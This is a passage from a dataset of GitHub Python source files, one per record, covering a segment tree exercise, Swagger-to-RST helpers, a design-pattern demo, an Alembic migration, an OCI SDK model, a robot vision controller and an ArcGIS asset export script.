\"Curtains\",\n]\n\n","repo_name":"iothus14/Pixie-Home-Assistant-Integration","sub_path":"custom_components/pixie/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41746404591","text":"class Node(object):\r\n def __init__(self, start, end):\r\n self.start = start\r\n self.end = end\r\n self.total = 0\r\n self.left = None\r\n self.right = None\r\n\r\nclass NumArray(object):\r\n def __init__(self,arr):\r\n self.arr = arr\r\n #initialize data structure\r\n\r\n def createTree(self, arr, l, r):\r\n #base case\r\n if l > r:\r\n return None\r\n #leaf case\r\n if l == r:\r\n n = Node(l,r)\r\n n.total = arr[l]\r\n return n\r\n\r\n #recursive case\r\n mid = (l+r) //2\r\n root = Node(l,r)\r\n root.left = self.createTree(arr, l, mid)\r\n root.right = self.createTree(arr, mid+1, r)\r\n\r\n root.total = root.left.total + root.right.total\r\n return root\r\n\r\n root = createTree(self.arr, 0, len(self.arr)-1)\r\n\r\n\r\n def updateVal(root, i, val):\r\n\r\n #Base case. The actual value will be updated in a leaf.\r\n #The total is then propogated upwards\r\n if root.start == root.end:\r\n root.total = val\r\n return val\r\n\r\n mid = (root.start + root.end) // 2\r\n\r\n #If the index is less than the mid, that leaf must be in the left subtree\r\n if i <= mid:\r\n updateVal(root.left, i, val)\r\n\r\n #Otherwise, the right subtree\r\n else:\r\n updateVal(root.right, i, val)\r\n\r\n #Propogate the changes after recursive call returns\r\n root.total = root.left.total + root.right.total\r\n\r\n return root.total\r\n\r\n return updateVal(self.root, i, val)\r\n\r\n def sumRange(self, i, j):\r\n \"\"\"\r\n sum of elements nums[i..j], inclusive.\r\n :type i: int\r\n :type j: int\r\n :rtype: int\r\n \"\"\"\r\n #Helper function to calculate range sum\r\n def rangeSum(root, i, j):\r\n\r\n #If the range exactly matches the root, we already have the sum\r\n if root.start == i and root.end == j:\r\n return root.total\r\n\r\n mid = (root.start + root.end) // 2\r\n\r\n #If end of the range is less than the mid, the entire interval lies\r\n #in the left subtree\r\n if j <= mid:\r\n return rangeSum(root.left, i, j)\r\n\r\n #If start of the interval is greater than mid, the entire inteval lies\r\n #in the right subtree\r\n elif i >= mid + 1:\r\n return rangeSum(root.right, i, j)\r\n\r\n #Otherwise, the interval is split. 
So we calculate the sum recursively,\r\n #by splitting the interval\r\n else:\r\n return rangeSum(root.left, i, mid) + rangeSum(root.right, mid+1, j)\r\n\r\n return rangeSum(self.root, i, j)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n N, K = [int(x) for x in input().split()]\r\n arr= [0]*N #create the string\r\n numArray = NumArray(arr) #initialize data structure\r\n right = len(arr)-1\r\n numArray.createTree(arr, 0, right) # createtheTree\r\n\r\n for i in range(K):\r\n inst = input().split() #take in instruction\r\n if inst[0] == \"F\":\r\n if arr[inst[1]] == 0:\r\n numArray.updateVal(inst[1], 1)\r\n else:\r\n numArray.updateVal(inst[1], 0)\r\n if inst[0] == \"C\":\r\n num_1 = numArray.sumRange(inst[1],inst[2])\r\n print(num_1)\r\n","repo_name":"velvetarchangel/algorithm_problems","sub_path":"supercomputer.py","file_name":"supercomputer.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9963489506","text":"# coding: utf-8\n\nimport sys\ntry:\n import pypandoc\nexcept ImportError:\n WITH_PANDOC = False\nelse:\n WITH_PANDOC = True\n\nfrom swg2rst.swagger.base_swagger_object import BaseSwaggerObject\nfrom swg2rst.swagger.schema_objects import SchemaObjects\nfrom swg2rst.swagger.schema import SchemaMapWrapper\nfrom swg2rst.swagger.constants import SchemaTypes\nfrom swg2rst.swagger.operation import Operation\nfrom json import dumps\n\nHEADERS = {1: '=', 2: '~', 3: '-', 4: '+', 5: '^'}\n\n\nclass SwaggerObject(BaseSwaggerObject):\n\n @staticmethod\n def sorted(collection):\n \"\"\"\n sorting dict by key,\n schema-collection by schema-name\n operations by id\n \"\"\"\n if len(collection) < 1:\n return collection\n\n if isinstance(collection, dict):\n return sorted(collection.items(), key=lambda x: x[0])\n\n if isinstance(list(collection)[0], Operation):\n key = lambda x: x.operation_id\n elif isinstance(list(collection)[0], str):\n key = lambda x: SchemaObjects.get(x).name\n else:\n raise TypeError(type(collection[0]))\n return sorted(collection, key=key)\n\n def get_regular_properties(self, _type, *args, **kwargs):\n \"\"\"Make table with properties by schema_id\n :param str _type:\n :rtype: str\n \"\"\"\n if not SchemaObjects.contains(_type):\n return _type\n schema = SchemaObjects.get(_type)\n if schema.schema_type == SchemaTypes.DEFINITION and not kwargs.get('definition'):\n return ''\n head = \"\"\".. 
csv-table::\n :delim: |\n :header: \"Name\", \"Required\", \"Type\", \"Format\", \"Properties\", \"Description\"\n :widths: 20, 10, 15, 15, 30, 25\n\n\"\"\"\n body = []\n if schema.properties:\n for p in schema.properties:\n body.append(' {} | {} | {} | {} | {} | {}'.format(\n p.get('name') or '',\n 'Yes' if p.get('required') else 'No',\n self.get_type_description(p['type'], *args, **kwargs),\n p.get('type_format') or '',\n '{}'.format(p.get('type_properties') or ''),\n p.get('description') or '')\n )\n body.sort()\n return (head + '\\n'.join(body))\n\n def get_type_description(self, _type, suffix='', *args, **kwargs):\n \"\"\" Get description of type\n :param suffix:\n :param str _type:\n :rtype: str\n \"\"\"\n if not SchemaObjects.contains(_type):\n return _type\n schema = SchemaObjects.get(_type)\n if schema.all_of:\n models = ','.join(\n (self.get_type_description(_type, *args, **kwargs) for _type in schema.all_of)\n )\n result = '{}'.format(models.split(',')[0])\n for r in models.split(',')[1:]:\n result += ' extended {}'.format(r)\n elif schema.is_array:\n result = 'array of {}'.format(\n self.get_type_description(schema.item['type'], *args, **kwargs))\n else:\n result = ':ref:`{} <{}{}>`'.format(schema.name, schema.schema_id, suffix)\n return result\n\n def get_additional_properties(self, _type, *args, **kwargs):\n \"\"\"Make head and table with additional properties by schema_id\n :param str _type:\n :rtype: str\n \"\"\"\n if not SchemaObjects.contains(_type):\n return _type\n schema = SchemaObjects.get(_type)\n body = []\n for sch in schema.nested_schemas: # complex types\n nested_schema = SchemaObjects.get(sch)\n if not (nested_schema or isinstance(nested_schema, SchemaMapWrapper)):\n continue\n\n body.append('Map of {{\"key\":\"{}\"}}\\n\\n'.format(self.get_type_description(\n nested_schema.schema_id, *args, **kwargs)) # head\n )\n if nested_schema.is_array: # table\n _schema = SchemaObjects.get(nested_schema.item.get('type'))\n if _schema and _schema.schema_type == SchemaTypes.INLINE:\n body.append(self.get_regular_properties(_schema.schema_id, *args, **kwargs))\n else:\n body.append(self.get_regular_properties(nested_schema.schema_id, *args, **kwargs))\n if schema.type_format: # basic types, only head\n body.append(\n 'Map of {{\"key\":\"{}\"}}'.format(self.get_type_description(schema.type_format, *args, **kwargs)))\n return ''.join(body)\n\n\ndef header(value, header_value):\n return u'{}\\n{}'.format(value, HEADERS[header_value] * len(value))\n\n\ndef md2rst(obj):\n if WITH_PANDOC:\n return pypandoc.convert(obj, to='rst', format='markdown')\n else:\n return obj.replace('```', '\\n')\n\n\ndef json_dumps(obj, **kwargs):\n return dumps(obj, sort_keys=True, indent=kwargs.get('indent'))\n","repo_name":"Arello-Mobile/swagger2rst","sub_path":"swg2rst/utils/rst.py","file_name":"rst.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"1897989966","text":"\"\"\"\nWhen it's easier to copy an existing object to fully initialize a new one\nPrototype - a partially or fully initialized object that you copy (clone) and make use of.\n\nIdea is that we have existing design, we got a copy of this design, customize and use\n- partially constructed\n- fully constructed\n\"\"\"\nimport copy\n\n\nclass Address:\n def __init__(self, street_address, city, country):\n self.country = country\n self.city = city\n self.street_address = street_address\n\n def __str__(self):\n return 
f'{self.street_address}, {self.city}, {self.country}'\n\n\nclass Person:\n def __init__(self, name, address):\n self.name = name\n self.address = address\n\n def __str__(self):\n return f'{self.name} lives at {self.address}'\n\n\n# john = Person('John', Address('123 Road', 'London', 'UK'))\n# print(john)\n# create new person who lives in the same place\n# jane = john # make copy BUT it's a reference assigment so 2 var are points at the same object\n# jane.name = 'Jane' # customize\n# # but this will not going to work\n# print(john)\n# print(jane)\n# Cause they referred to the same object\n# Jane lives at 123 Road, London, UK\n# Jane lives at 123 Road, London, UK\n\n# also we can try doing it this way BUT when changing address as it still the same object it will change in 2 objects\n\naddress = Address('123 Road', 'London', 'UK')\njohn = Person('John', address)\njane = Person('Jane', address)\njane.address.street_address = \"123B Road\"\nprint(john, \" : \", hex(id(john.address))) # 123B Road\nprint(jane, \" : \", hex(id(john.address))) # 123B Road\n# AND THIS IS HAPPENS CAUSE Person object keeps the refference to the Adress. So when we\n# jane.address.street_address = \"123B Road\" modifying adress object. We modify the source so for john it also\n# changes\n\n# John lives at 123B Road, London, UK\n# Jane lives at 123B Road, London, UK\n# AND this is happening cause both objects are refer to the same address object (keep reference)\n# and when reference is modified it modifies everywhere\nprint(\"-----\")\n\n# and this should be done using deep copy.\n# It's performs a recursive copy of all of the attributes of an object\njohn = Person('John', Address('123 Road', 'London', 'UK'))\nprint(hex(id(john.address))) # 0x2a908939fd0\njane = copy.deepcopy(john) # now it's separate object not in any way referring to john\nprint(hex(id(jane.address))) # 0x2a908939a60\n\n# jane = copy.copy(john) # Shallow copy so any obj that is reference just gets copied as a reference\n# so jane refers to the same address as John\n# will change name correctly BUT address for both\njane.name = 'Jane'\njane.address.street_address = '123B Road'\nprint(john, jane, sep=\"\\n\")\n# print(jane)\n\na = 1\nprint(hex(id(a))) # 0x21c32be6930\na += 1\nprint(hex(id(a))) # 0x21c32be6950 Потому что после операции += у нас создался совершенно новый инт.\n# ВСЁ ПОТОМУ ЧТО int - immutable\n","repo_name":"fif911/desing_patterns","sub_path":"4. Prototype/1. Prototype.py","file_name":"1. 
Prototype.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36526104505","text":"from functools import lru_cache\nfrom typing import List\n\nclass Solution(object):\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates = sorted(candidates)\n\n def _function(candidates, target):\n results = []\n\n if target in candidates:\n results.append([target,])\n\n for index, item in enumerate(candidates):\n for result in _function(candidates[:index] + candidates[index + 1:], target - item):\n if item > result[0]:\n continue\n results.append([item] + result)\n\n return results\n return _function(candidates, target)\n\nimport pytest\n\n@pytest.mark.parametrize(\n 'candidates, target, expected_result', [\n (\n [10,1,2,7,6,1,5], 8, [[1,1,6],[1,2,5],[1,7],[2,6]]\n ),\n (\n [2,5,2,1,2], 5, [[1,2,2], [5]]\n ),\n # (\n # [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], 27, []\n # ),\n ]\n)\ndef test(candidates, target, expected_result):\n print(Solution().combinationSum2(candidates, target))\n # assert Solution().combinationSum2(candidates, target) == expected_result\n","repo_name":"zqmillet/leetcode","sub_path":"chapters/combination_sum_ii/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23364163159","text":"import base_conversion as bc\n\n# Example 1:\n# If we want to convert a number in any base to decimal we use convert_base_to_dec\n# In this case we want to convert the hexadecimal number 'F4A' to decimal\nchars_base16 = \"0123456789ABCDEF\"\nanswer1 = bc.convert_base_to_dec(\"F4A\", chars_base16)\nprint(\"F4A in hexadecimal is \" + str(answer1) + \" in decimal\")\n\n# Example 2:\n# If we want to convert a decimal number to another base we use convert_dec_to_base\n# In this case we want to convert the number 180 to base 5\nchars_base5 = \"01234\"\nanswer2 = bc.convert_dec_to_base(180, chars_base5)\nprint(\"180 in decimal is \" + str(answer2) + \" in base 5\")\n\n# Example 3:\n# We want to convert the octal(base 8) number '7245' to binary(base 2)\nchars_base8 = \"01234567\"\nchars_base2 = \"01\"\nnumber_base8 = \"7245\"\nanswer3 = bc.convert_base_to_base(number_base8, chars_base8, chars_base2)\nprint(\"7245 in base8 is \" + str(answer3) + \" in binary\")\n","repo_name":"marten-voorberg/Base-Conversion","sub_path":"examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31603719059","text":"from .monitored_resource_credential import MonitoredResourceCredential\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass EncryptedCredentials(MonitoredResourceCredential):\n \"\"\"\n Encrypted credentials [indicated by the type property in CredentialStore].\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new EncryptedCredentials object with values from keyword arguments. 
The default value of the :py:attr:`~oci.stack_monitoring.models.EncryptedCredentials.credential_type` attribute\n of this class is ``ENCRYPTED`` and it should not be changed.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param source:\n The value to assign to the source property of this EncryptedCredentials.\n :type source: str\n\n :param name:\n The value to assign to the name property of this EncryptedCredentials.\n :type name: str\n\n :param type:\n The value to assign to the type property of this EncryptedCredentials.\n :type type: str\n\n :param description:\n The value to assign to the description property of this EncryptedCredentials.\n :type description: str\n\n :param credential_type:\n The value to assign to the credential_type property of this EncryptedCredentials.\n Allowed values for this property are: \"EXISTING\", \"PLAINTEXT\", \"ENCRYPTED\"\n :type credential_type: str\n\n :param key_id:\n The value to assign to the key_id property of this EncryptedCredentials.\n :type key_id: str\n\n :param properties:\n The value to assign to the properties property of this EncryptedCredentials.\n :type properties: list[oci.stack_monitoring.models.CredentialProperty]\n\n \"\"\"\n self.swagger_types = {\n 'source': 'str',\n 'name': 'str',\n 'type': 'str',\n 'description': 'str',\n 'credential_type': 'str',\n 'key_id': 'str',\n 'properties': 'list[CredentialProperty]'\n }\n\n self.attribute_map = {\n 'source': 'source',\n 'name': 'name',\n 'type': 'type',\n 'description': 'description',\n 'credential_type': 'credentialType',\n 'key_id': 'keyId',\n 'properties': 'properties'\n }\n\n self._source = None\n self._name = None\n self._type = None\n self._description = None\n self._credential_type = None\n self._key_id = None\n self._properties = None\n self._credential_type = 'ENCRYPTED'\n\n @property\n def key_id(self):\n \"\"\"\n **[Required]** Gets the key_id of this EncryptedCredentials.\n The master key should be created in OCI Vault owned by the client of this API.\n The user should have permission to access the vault key.\n\n\n :return: The key_id of this EncryptedCredentials.\n :rtype: str\n \"\"\"\n return self._key_id\n\n @key_id.setter\n def key_id(self, key_id):\n \"\"\"\n Sets the key_id of this EncryptedCredentials.\n The master key should be created in OCI Vault owned by the client of this API.\n The user should have permission to access the vault key.\n\n\n :param key_id: The key_id of this EncryptedCredentials.\n :type: str\n \"\"\"\n self._key_id = key_id\n\n @property\n def properties(self):\n \"\"\"\n **[Required]** Gets the properties of this EncryptedCredentials.\n The credential properties list. Credential property values will be encrypted format.\n\n\n :return: The properties of this EncryptedCredentials.\n :rtype: list[oci.stack_monitoring.models.CredentialProperty]\n \"\"\"\n return self._properties\n\n @properties.setter\n def properties(self, properties):\n \"\"\"\n Sets the properties of this EncryptedCredentials.\n The credential properties list. 
Credential property values will be encrypted format.\n\n\n :param properties: The properties of this EncryptedCredentials.\n :type: list[oci.stack_monitoring.models.CredentialProperty]\n \"\"\"\n self._properties = properties\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/stack_monitoring/models/encrypted_credentials.py","file_name":"encrypted_credentials.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"12649075221","text":"\"\"\" Create table Category\n\nRevision ID: 4ddbd7d83e6a\nRevises: 1b9a20f9a38f\nCreate Date: 2015-01-16 16:15:26.335065\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '4ddbd7d83e6a'\ndown_revision = '1b9a20f9a38f'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('category',\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', postgresql.UUID(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.Column('is_visible', sa.Boolean(), nullable=False),\n sa.Column('client_id', postgresql.UUID(), nullable=False),\n sa.ForeignKeyConstraint(['client_id'], [u'client.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name', 'client_id', name='category_name_client_id_key')\n )\n op.add_column('cause', sa.Column('category_id', postgresql.UUID(), nullable=True))\n\n connection = op.get_bind()\n connection.execute('insert into category (id, name, created_at, client_id, is_visible) '\n 'select distinct on (category) id, category, created_at, client_id, \\'True\\' '\n 'from cause where category is not null')\n connection.execute('update cause ca set category_id=c.id from category c where ca.category=c.name')\n\n op.drop_column('cause', 'category')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('cause', sa.Column('category', sa.Text(), nullable=True))\n connection = op.get_bind()\n connection.execute('update cause c set category=cn.name from category cn '\n 'where c.category_id=cn.id and c.category_id is not null')\n\n op.drop_column('cause', 'category_id')\n op.drop_table('category')\n ### end Alembic commands ###\n","repo_name":"dvdn/Chaos","sub_path":"migrations/versions/4ddbd7d83e6a_.py","file_name":"4ddbd7d83e6a_.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4805882746","text":"#!/usr/bin/python3\ndef weight_average(my_list=[]):\n if not my_list:\n return 0\n score = 0\n weight = 0\n for a in my_list:\n score += a[0] * a[1]\n weight += a[1]\n return score / weight\n","repo_name":"Shakir-ahmed1/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/100-weight_average.py","file_name":"100-weight_average.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40146263468","text":"from robot_control import Robot, commands\nfrom robot_map import RobotMap\nfrom vision import aruco_init, detect\nfrom ledik import *\nfrom comm import data_comm\n\nimport cv2\nimport time\nimport asyncio\n\nclass main_program:\n def __init__(self):\n self.run = False\n\n def main(self, sock_instance):\n #variables\n n_objects_glob = 0\n start_objects_glob = 0\n start_time = int(time.time())\n buf = []\n i = 0\n\n print(\"testing\")\n robot = Robot()\n ep_led = robot.led\n robot.camera_init()\n robot.wall_init(1,600)\n detector = aruco_init()\n\n while True:\n img = robot.get_frame()\n self.n_objects, ids, img_detect = detect(img, detector)\n\n if i == 0: #run only once\n start_objects_glob = self.n_objects\n i += 1\n\n # if n_objects:\n # print(\"sus\")\n # print(asyncio.run(robot.send_cmd(\"led control comp all r 255 g 0 b 0 effect blink\")))\n if self.n_objects != n_objects_glob:\n async def test(n_objects, rozdil):\n await asyncio.sleep(1)\n if self.n_objects == n_objects:\n if rozdil<0:\n print(\"redbull gambit!\")\n sock_instance.emit(\"message\", \"Ztratil se 1 Redbull, lokace byla zaznamenána na mapě\")\n elif rozdil>0:\n print(\"někdo přidal redbulla?\")\n sock_instance.emit(\"message\", \"Někdo k vaší objednávce přidal 1 redbulla zadarmo :)\")\n asyncio.run(test(self.n_objects,self.n_objects-n_objects_glob))\n\n #validate buffer\n # buf.append(-1)\n # #sock_server.set_data(\"object_lost\")\n\n # if 1 in buf and -1 not in buf:\n # print(\"někdo přidal redbulla?\")\n # sock_instance.emit(\"message\", \"Někdo k vaší objednávce přidal 1 redbulla zadarmo :)\")\n # buf.pop(buf.index(1))\n # #buf = []\n\n # if -1 in buf and 1 not in buf: \n # print(\"redbull gambit!\")\n # sock_instance.emit(\"message\", \"Ztratil se 1 Redbull, lokace byla zaznamenána na mapě\")\n # buf.pop(buf.index(-1))\n # #buf = []\n\n n_objects_glob = self.n_objects\n battery_status = robot.battery_level\n\n #put data into queue\n data_comm.put_data(self.n_objects, start_time, start_objects_glob, battery_status)\n if self.run:\n robot.follow_wall(-100) #wall following\n #transform commands into map\n \n\n ret, buffer = cv2.imencode('.jpg', img_detect)\n frame = buffer.tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n def main_map(self):\n robotmap = RobotMap()\n while True:\n robotmap.draw_interest_point(320, 320)\n 
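# overlay the movement commands recorded by robot_control onto the map view\n            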
robotmap.upload_commands(commands)\n            frame = robotmap.get_map()\n            ret, buffer = cv2.imencode('.jpg', frame)\n            frame = buffer.tobytes()\n            yield (b'--frame\\r\\n'\n                   b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\n#if __name__ == \"__main__\":\n#    main()","repo_name":"Plajta/RobotControl","sub_path":"src/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"1104687541","text":"from __future__ import print_function\nimport arcrest\nfrom arcrest.security import AGOLTokenSecurityHandler\nfrom arcrest.agol import FeatureLayer\nimport csv\nimport datetime\nimport os\nimport sys\nimport arcresthelper\nfrom arcresthelper import common\n\ndef validate(date_text,dateTimeFormat):\n    try:\n        datetime.datetime.strptime(date_text, dateTimeFormat)\n        return True\n    except ValueError:\n        return False\ndef trace():\n    \"\"\"\n        trace finds the line, the filename\n        and error message and returns it\n        to the user\n    \"\"\"\n    import traceback, inspect\n    tb = sys.exc_info()[2]\n    tbinfo = traceback.format_tb(tb)[0]\n    filename = inspect.getfile(inspect.currentframe())\n    # script name + line number\n    line = tbinfo.split(\", \")[1]\n    # Get Python syntax error\n    #\n    synerror = traceback.format_exc().splitlines()[-1]\n    return line, filename, synerror\n\ndef main():\n    try:\n        dateTimeFormat = \"%Y/%m/%d %H:%M:%S\"#Date time format of the service, example'2016-04-26 04:00:00'\n        #log file to store details\n        logFile = r\"c:\\temp\\adoptedAssets.log\"\n        common.init_log(logFile)\n        print (\"###### Date Extraction Process Started ######\")\n        username = \"\"\n        password = \"\"\n        proxy_port = None\n        proxy_url = None\n        agolSH = None\n        print (\"\\tStarted at {0}\".format(datetime.datetime.now().strftime(dateTimeFormat)))\n        #Create an authenticated connection to the portal\n        if username != \"\":\n            agolSH = AGOLTokenSecurityHandler(username=username,\n                                              password=password)\n            print (\"\\tLogged into the portal\")\n        \n        #Settings\n        url = 'http://services1.arcgis.com/DlnuvLGpDczjeSgG/arcgis/rest/services/CatchBasin/FeatureServer/0/' #URL to adoption service\n        statusField = 'Assetstatus' #Field with status, used to build SQL\n        statusValue = 'Adopted' #Value to search for in the StatusField\n        statusUpdateField = 'Laststatusupdate' #Field used to restrict query to only records since last query\n        out_fields ='OBJECTID,GIS_ID,Nickname' #Fields to save to the output CSV\n        \n        #The location and file name to save the results to\n        saveLocation = r\"c:\\temp\\adoptedAssets.csv\"\n        #File with the date of the last run, if it does not exist, all features are returned and file is created for next run\n        lastRunDetails = r\"c:\\temp\\lastrundate.txt\"\n        \n        lastQueryDate = None\n        #Start building the SQL Query\n        sql = statusField + \" = '\" + statusValue + \"'\"\n        #Open the file with the last run date\n        if os.path.isfile(lastRunDetails):\n            print(\"\\tLast run file exists\")\n            with open(lastRunDetails, 'r') as configFile:\n                lastQueryDate = configFile.read()\n                configFile.close()\n            print(\"\\t\\tLast query date: {0}\".format(lastQueryDate))\n        #If the last query date file was found and value is a date\n        if lastQueryDate is not None and validate(date_text=lastQueryDate, dateTimeFormat=dateTimeFormat):\n            sql = sql + \" AND \" + statusUpdateField + \" >= \" + \"'\" + lastQueryDate + \"'\"\n        #Add current time to query\n        queryDate = datetime.datetime.now().strftime(dateTimeFormat)\n        sql = sql + \" AND \" + statusUpdateField + \" <= \" + \"'\" + 
queryDate + \"'\"\n print(\"\\tSQL: {0}\".format(sql))\n #Create a connection to the layer\n fl = FeatureLayer(\n url=url,\n securityHandler=agolSH,\n proxy_port=proxy_port,\n proxy_url=proxy_url,\n initialize=True)\n \n #query the layer\n featureSet = fl.query(where=sql,\n out_fields=out_fields,\n returnGeometry=False) \n print(\"\\t{0} feature returned\".format(len(featureSet.features)))\n #Create a new output writer\n if (len(featureSet.features) == 0):\n if os.path.isfile(saveLocation):\n os.remove(saveLocation)\n else:\n with open(saveLocation, \"wb+\") as csvFile:\n f = csv.writer(csvFile)\n fields = []\n #write the headers to the csv\n for field in featureSet.fields:\n fields.append(field['name'])\n f.writerow(fields)\n \n newRow = []\n #Loop through the results and save each to a row\n for feature in featureSet:\n newRow = []\n for field in featureSet.fields:\n newRow.append(feature.get_value(field['name']))\n f.writerow(newRow)\n csvFile.close()\n print(\"\\tCSV updated\")\n #Update the last run file\n with open(lastRunDetails, 'w') as configFile:\n configFile.write(queryDate)\n configFile.close()\n print(\"\\t{0} saved to file\".format(queryDate))\n print (\"\\tCompleted at {0}\".format(datetime.datetime.now().strftime(dateTimeFormat)))\n print (\"###### Completed ######\")\n \n except:\n line, filename, synerror = trace()\n print (\"error on line: %s\" % line)\n print (\"error in file name: %s\" % filename)\n print (\"with error message: %s\" % synerror)\n \nif __name__ == \"__main__\":\n main()","repo_name":"Esri/adopta","sub_path":"Scripts/AssetByStatus.py","file_name":"AssetByStatus.py","file_ext":"py","file_size_in_byte":5394,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"20162721354","text":"import statsmodels.formula.api as smf\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\n# scored_y = pd.DataFrame([\n# # {\"t\": 1, \"y\": 1000},\n# {\"t\": 2, \"y\": 725},\n# {\"t\": 3, \"y\": 468},\n# {\"t\": 4, \"y\": 337}\n# ])\n\n# scored_x = pd.DataFrame([\n# # {\"t\": 1, \"x\": 1430},\n# {\"t\": 2, \"x\": 1368},\n# {\"t\": 3, \"x\": 1100},\n# {\"t\": 4, \"x\": 874}\n# ])\n\n# missed_y = pd.DataFrame([\n# {\"t\": 1, \"y\": 711},\n# {\"t\": 2, \"y\": 580},\n# {\"t\": 3, \"y\": 541},\n# {\"t\": 4, \"y\": 562}\n# ])\n\n# missed_x = pd.DataFrame([\n# {\"t\": 1, \"x\": 1331},\n# {\"t\": 2, \"x\": 1118},\n# {\"t\": 3, \"x\": 920},\n# {\"t\": 4, \"x\": 726},\n# ])\n\nframes_scored = [\n # r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\scored\\i_8452_00050.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\scored\\i_8452_00051.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\scored\\i_8452_00052.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\scored\\i_8452_00053.png\"\n]\n\nframes_missed = [\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\missed\\i_8452_00131.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\missed\\i_8452_00132.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\missed\\i_8452_00133.png\",\n r\"C:\\Users\\austi\\Downloads\\ball motion\\ball motion\\missed\\i_8452_00134.png\",\n]\n\nblue_lower = np.array([90, 50, 100], np.uint8)\nblue_upper = np.array([150, 255, 255], np.uint8)\n\npoints_x = []\npoints_y = []\n\nfor i, file_path in enumerate(frames_missed):\n img = cv2.imread(file_path)\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n blue_mask = cv2.inRange(hsv, 
blue_lower, blue_upper)\n contours, _ = cv2.findContours(blue_mask,\n cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n \n for contour in sorted(contours, key = lambda x: cv2.contourArea(x), reverse=True):\n area = cv2.contourArea(contour)\n if(area > 300):\n x, y, _, _ = cv2.boundingRect(contour)\n points_x.append(x)\n points_y.append(y)\n break\n\npoints_y = pd.DataFrame(zip(points_y, list(np.arange(1,4))), columns=[\"y\", \"t\"])\npoints_x = pd.DataFrame(zip(points_x, list(np.arange(1,4))), columns=[\"x\", \"t\"])\n\nm_y = smf.ols(formula=\"y ~ t + np.power(t, 2)\", data=points_y).fit()\nm_x = smf.ols(formula=\"x ~ t\", data=points_x).fit()\nprint(m_y.summary())\nprint(m_x.summary())\n\npred_x = []\npred_y = []\nfor t in range(1, 11):\n y = m_y.params[\"np.power(t, 2)\"]*t**2 + m_y.params[\"t\"]*t + m_y.params[\"Intercept\"]\n x = m_x.params[\"t\"]*t + m_x.params[\"Intercept\"]\n pred_x.append(x)\n pred_y.append(y)\n\nplt.scatter(x=points_x[\"x\"], y=points_y[\"y\"])\nplt.plot(pred_x, pred_y)\nplt.plot([180, 160, 535, 500, 180], [450, 570, 520, 590, 450])\nplt.gca().invert_yaxis()\nplt.show()\nprint()\n","repo_name":"simra/frc_vision","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15247986437","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass 